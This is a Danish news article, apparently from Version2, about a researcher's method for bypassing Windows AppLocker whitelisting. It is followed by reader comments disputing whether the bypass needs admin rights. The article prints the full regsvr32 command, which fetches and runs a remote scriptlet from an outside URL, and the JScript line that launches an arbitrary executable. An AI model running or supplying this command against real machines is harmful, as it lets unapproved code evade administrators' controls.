Enkel kommando omgår whitelist-feature i Windows

Det er muligt at snyde AppLocker-funktionen i Windows med en enkel kommando.

Ifølge sikkerhedsforskeren Casey Smith skulle det med en relativ enkelt kommmando være mulig at omgå en sikkerhedsfeature, der har eksisteret siden Windows 7 i Microsofts styresystem.

Det fortæller det britiske teknologimedie The Register.

Det drejer sig om AppLocker i Windows, der kan bruges af it-administratorer til at definere, hvilke applikationer og scripts, der må køre på klient-maskinerne. Altså for på den måde at kunne forhindre brugrene i at installere uhensigsmæssighed på maskinerne.

Men det skulle være muligt for en bruger uden admin-rettigheder at omgå AppLockers whitelist over tilladte programmer ved at køre kommandoen:

regsvr32 /s /n /u /i:http://reg.cx/2kK3 scrobj.dll

The Register har selv testet på mediets eget Windows Enterprise-system - det er der kommet en video ud af - og den skulle være god nok. Ovenstående er blot et test-eksempel, der kører cmd.exe, som starter en terminal op.

regsvr32 kan til at registrere og afregistrere COM-script-filer i Windows. Og den kommando er det muligt at fodre med et xml-script til en ekstern url.

Og dette script kan placeres på en ekstern server (både http og https), hvor det skulle være muligt at skrue det sammen på en måde, så en exe-fil bliver forsøgt eksekveret på systemet udenom AppLockers whitelist.

XML-filen i førnævnte indeholder følgende linje:

var r = new ActiveXObject("WScript.Shell").Run("cmd.exe");

Og her kan cmd.exe altså i princippet udskiftes med alle mulige andre eksekverbare filer, som i udgangspunktet ikke skulle blive stoppet af AppLocker.

Dog, bemærker The Register, så kan der være andre sikkerhedsmekanismer på plads i Windows, som gør, at det alligevel ikke er muligt at køre ikke-tillade programmer.

Mediet nævner Windows 10's Device Guard som noget, der muligvis ville kunne stoppe et forsøg på at køre ikke-tilladt software.

Artiklen er opdateret, så det er yderligere understreget, at der er tale om en AppLockers whitelist-feature og så det fremgår, at hacket ifølge Casey Smith også skulle kunne køres uden adminrettigheder

Kom gratis med til Danmarks største IT-sikkerhedsevent!

Infosecurity, Europas mest populære IT-sikkerhedsevent, afholdes for første gang i Danmark den 3. og 4. maj 2016. 50 udstillere, 5 konferencesale og mere end 60 seminarer og caseoplæg fra ind- og udland. Læs mere her.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Kommentarer (3)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Martin Kristiansen

Man skal være normalt være admin for at kunne skrive til den del af registry regsvr32 smider OCX entries i.

Hvis man er admin har man allerede temmligt frie tøjler på Windows. F.eks kan man jo bare malware.exe som tilladt i AppLocker.

  • 3
  • 1
Martin Jensen

Når jeg sætter det op mod en applocker denied .exe fil, så kan den ikke eksekveres. Så i min optik er dette ikke testet korrekt. Ellers må der skulle mere til.
Til eksempel blokerede jeg cmd.exe med applocker, hvorefter den ikke kunne eksekveres. Dernæst forsøgte jeg med en hjemmeudviklet whitelistet applikation, som startede fint. Blev denne derefter blokeret kunne denne heller ikke startes.

  • 1
  • 0
Jakob Møllerhøj Editor

Man skal være normalt være admin for at kunne skrive til den del af registry regsvr32 smider OCX entries i.

Vi har ikke testet ovenstående, men ifølge det oprindelige blogindlæg, så kræver det netop ikke, at brugeren er admin. Artiklen er desuden justeret, så det bliver understreget, at der er tale om at omgå AppLockers whitelist-funktion. Jakob - V2

  • 0
  • 0
Log ind eller Opret konto for at kommentere